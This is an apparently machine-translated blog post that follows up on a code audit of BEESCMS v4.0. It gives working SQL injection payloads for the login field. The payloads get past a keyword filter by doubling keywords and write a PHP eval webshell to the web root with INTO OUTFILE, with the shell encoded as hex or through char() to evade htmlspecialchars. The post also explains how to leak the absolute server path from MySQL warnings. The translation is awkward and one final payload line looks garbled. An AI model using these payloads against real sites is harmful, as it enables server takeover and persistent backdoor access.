further thinking on the sql injection vulnerability of beescms

Posted by tzul at 2020-03-26

Note: original author: 0h1in9e - the article was first published in the spring and Autumn period of I. It is forbidden to reprint without permission!

Follow the previous [code audit preliminary] beescms v4.0_rsql injection

0x01 Preface

In the previous article, the conditions and reasons of SQL injection are introduced in detail, but the thinking of using methods is still limited and has no effect. In addition, the introduction of single quotes is not very clear. In this article, we continue to analyze this SQL injection.

A feature of 0x02 MySQL injection

The previous analysis shows that due to the influence of the function fl_html(), it is actually the PHP function htmlspecialchars(), which results in the inability to write the shell to the target machine. In fact, the effect of MySQL injection can be achieved by using a feature of MySQL injection. That is to say, hex code the shell part, or use the MySQL function char() to easily bypass the limitation here. Method 1: hex encodes the statement we write to the shell as follows:

fl_html() htmlspecialchars() char() user=admin' uni union on selselectect null,null,null,null,<?php @eval($_POST[a]); ?> in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

The hex code of the shell part is as follows: Here we use Python simple code:

>>> '<?php @eval($_POST[a]); ?>'.encode('hex') '3c3f70687020406576616c28245f504f53545b615d293b203f3e' user=admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b615d293b203f3e in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

Remember to add x before the code conversion or use the function unhex (3c3f70687020406576616c28245f504f53545b615d293b203f3e) directly. Then modify the data package write through burpsuit, as shown in the figure: check the file written locally as shown in the figure: you can see that the webshell is written at the same time as the password is burst. Next, we try to use the kitchen knife link to get the webshell successfully:


Method 2: use the char function MySQL built-in function char() to convert the ASCII code parameter inside into a string, which is also the webshell written above into the form of ASCII. Here we use Python to realize fast conversion:

>>> map(ord, "<?php @eval($_POST[a]); ?>") [60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62]

Then our injection statement can be written:

user=admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20 unhex(char(60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62))

The above two methods can successfully bypass some sensitive character filtering and write to webshell normally.

0x03 absolute path problem

As master @ zusheng commented in the previous article, the previous tests are all local tests. One problem is that we know the absolute path of the local file, but we don't know the absolute path of the website in the remote case. Is there no way for us to continue in this situation? In fact, if you are careful enough, you will find that there is an absolute path in the previous graph. Yes, it is the graph of burpsuit executing the injection statement. Then we know that we need to let MySQL show warring to get the path.

For example, you can write a shell statement without knowing the path, and you can also write a path that doesn't exist, as shown in the following figure:

There are many ways to do it, and there will always be new discoveries!

0x04 thinking about single quotation mark

There is a comment on the single quotation mark in the previous article, that is, since the htmlspecialchars function filters out the single quotation mark, how is the single quotation mark introduced into the injection statement? To solve this problem, I checked some data and tested this function locally, and got a result that by default, the function only parses double quotation marks, as shown in the figure:

In this case, HTML special chars (STR) written in the code have the problem of single quotation mark introduction.


0x05 summary

The seemingly simple audit process actually covers a lot of knowledge points. For example, the PHP syntax, mysql, website absolute path breaking and using Python to facilitate your work, etc. mentioned above, most of them depend on our regular accumulation. Moreover, we need to know how to be flexible. Just like the use of MySQL injection in this article, single quotation mark injection is very common, but if we don't know enough about it, it's difficult to successfully audit a system. Hope to gain something for you:)